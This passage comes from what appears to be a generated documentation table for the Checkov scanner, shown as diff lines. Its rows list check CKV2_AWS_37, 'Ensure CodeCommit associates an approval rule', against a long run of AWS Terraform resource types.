[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 665 | CKV2_AWS_37 | resource | aws_codecommit_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 666 | CKV2_AWS_37 | resource | aws_codecommit_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 667 | CKV2_AWS_37 | resource | aws_codedeploy_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 668 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 669 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 670 | CKV2_AWS_37 | resource | aws_codepipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 671 | CKV2_AWS_37 | resource | aws_codepipeline_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 672 | CKV2_AWS_37 | resource | aws_codestarnotifications_notification_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 673 | CKV2_AWS_37 | resource | aws_cognito_identity_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 674 | CKV2_AWS_37 | resource | aws_cognito_identity_pool_roles_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 675 | CKV2_AWS_37 | resource | aws_cognito_identity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 676 | CKV2_AWS_37 | resource | aws_cognito_resource_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 677 | CKV2_AWS_37 | resource | aws_cognito_user_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 678 | CKV2_AWS_37 | resource | aws_cognito_user_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 679 | CKV2_AWS_37 | resource | aws_cognito_user_pool_client | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 680 | CKV2_AWS_37 | resource | aws_cognito_user_pool_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 681 | CKV2_AWS_37 | resource | aws_config_aggregate_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 682 | CKV2_AWS_37 | resource | aws_config_config_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 683 | CKV2_AWS_37 | resource | aws_config_configuration_aggregator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 684 | CKV2_AWS_37 | resource | aws_config_configuration_recorder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 685 | CKV2_AWS_37 | resource | aws_config_configuration_recorder_status | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 686 | CKV2_AWS_37 | resource | aws_config_delivery_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 687 | CKV2_AWS_37 | resource | aws_config_organization_custom_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 688 | CKV2_AWS_37 | resource | aws_config_organization_managed_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 689 | CKV2_AWS_37 | resource | aws_cur_report_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 690 | CKV2_AWS_37 | resource | aws_customer_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 691 | CKV2_AWS_37 | resource | aws_datapipeline_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 692 | CKV2_AWS_37 | resource | aws_datasync_agent | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 693 | CKV2_AWS_37 | resource | aws_datasync_location_efs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 694 | CKV2_AWS_37 | resource | aws_datasync_location_nfs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 695 | CKV2_AWS_37 | resource | aws_datasync_location_s3 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 696 | CKV2_AWS_37 | resource | aws_datasync_location_smb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 697 | CKV2_AWS_37 | resource | aws_datasync_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 698 | CKV2_AWS_37 | resource | aws_dax_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 699 | CKV2_AWS_37 | resource | aws_dax_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 700 | CKV2_AWS_37 | resource | aws_dax_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 701 | CKV2_AWS_37 | resource | aws_db_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 702 | CKV2_AWS_37 | resource | aws_db_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 703 | CKV2_AWS_37 | resource | aws_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 704 | CKV2_AWS_37 | resource | aws_db_instance_role_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 705 | CKV2_AWS_37 | resource | aws_db_option_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 706 | CKV2_AWS_37 | resource | aws_db_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 707 | CKV2_AWS_37 | resource | aws_db_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 708 | CKV2_AWS_37 | resource | aws_db_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 709 | CKV2_AWS_37 | resource | aws_db_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 710 | CKV2_AWS_37 | resource | aws_default_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 711 | CKV2_AWS_37 | resource | aws_default_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 712 | CKV2_AWS_37 | resource | aws_default_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 713 | CKV2_AWS_37 | resource | aws_default_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 714 | CKV2_AWS_37 | resource | aws_default_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 715 | CKV2_AWS_37 | resource | aws_default_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 716 | CKV2_AWS_37 | resource | aws_devicefarm_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 717 | CKV2_AWS_37 | resource | aws_directory_service_conditional_forwarder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 718 | CKV2_AWS_37 | resource | aws_directory_service_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 719 | CKV2_AWS_37 | resource | aws_directory_service_log_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 720 | CKV2_AWS_37 | resource | aws_dlm_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 721 | CKV2_AWS_37 | resource | aws_dms_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 722 | CKV2_AWS_37 | resource | aws_dms_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 723 | CKV2_AWS_37 | resource | aws_dms_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 724 | CKV2_AWS_37 | resource | aws_dms_replication_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 725 | CKV2_AWS_37 | resource | aws_dms_replication_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 726 | CKV2_AWS_37 | resource | aws_dms_replication_task | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 727 | CKV2_AWS_37 | resource | aws_docdb_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 728 | CKV2_AWS_37 | resource | aws_docdb_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 729 | CKV2_AWS_37 | resource | aws_docdb_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 730 | CKV2_AWS_37 | resource | aws_docdb_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 731 | CKV2_AWS_37 | resource | aws_docdb_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 732 | CKV2_AWS_37 | resource | aws_dx_bgp_peer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 733 | CKV2_AWS_37 | resource | aws_dx_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 734 | CKV2_AWS_37 | resource | aws_dx_connection_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 735 | CKV2_AWS_37 | resource | aws_dx_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 736 | CKV2_AWS_37 | resource | aws_dx_gateway_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 737 | CKV2_AWS_37 | resource | aws_dx_gateway_association_proposal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 738 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 739 | CKV2_AWS_37 | resource | aws_dx_hosted_private_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 740 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 741 | CKV2_AWS_37 | resource | aws_dx_hosted_public_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 742 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 743 | CKV2_AWS_37 | resource | aws_dx_hosted_transit_virtual_interface_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 744 | CKV2_AWS_37 | resource | aws_dx_lag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 745 | CKV2_AWS_37 | resource | aws_dx_private_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 746 | CKV2_AWS_37 | resource | aws_dx_public_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 747 | CKV2_AWS_37 | resource | aws_dx_transit_virtual_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 748 | CKV2_AWS_37 | resource | aws_dynamodb_global_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 749 | CKV2_AWS_37 | resource | aws_dynamodb_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 750 | CKV2_AWS_37 | resource | aws_dynamodb_table_item | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 751 | CKV2_AWS_37 | resource | aws_ebs_default_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 752 | CKV2_AWS_37 | resource | aws_ebs_encryption_by_default | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 753 | CKV2_AWS_37 | resource | aws_ebs_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 754 | CKV2_AWS_37 | resource | aws_ebs_snapshot_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 755 | CKV2_AWS_37 | resource | aws_ebs_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 756 | CKV2_AWS_37 | resource | aws_ec2_availability_zone_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 757 | CKV2_AWS_37 | resource | aws_ec2_capacity_reservation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 758 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_authorization_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 759 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 760 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_network_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 761 | CKV2_AWS_37 | resource | aws_ec2_client_vpn_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 762 | CKV2_AWS_37 | resource | aws_ec2_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 763 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 764 | CKV2_AWS_37 | resource | aws_ec2_local_gateway_route_table_vpc_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 765 | CKV2_AWS_37 | resource | aws_ec2_tag | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 766 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 767 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_filter_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 768 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_session | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 769 | CKV2_AWS_37 | resource | aws_ec2_traffic_mirror_target | Ensure CodeCommit associates an approval rule | Terraform | 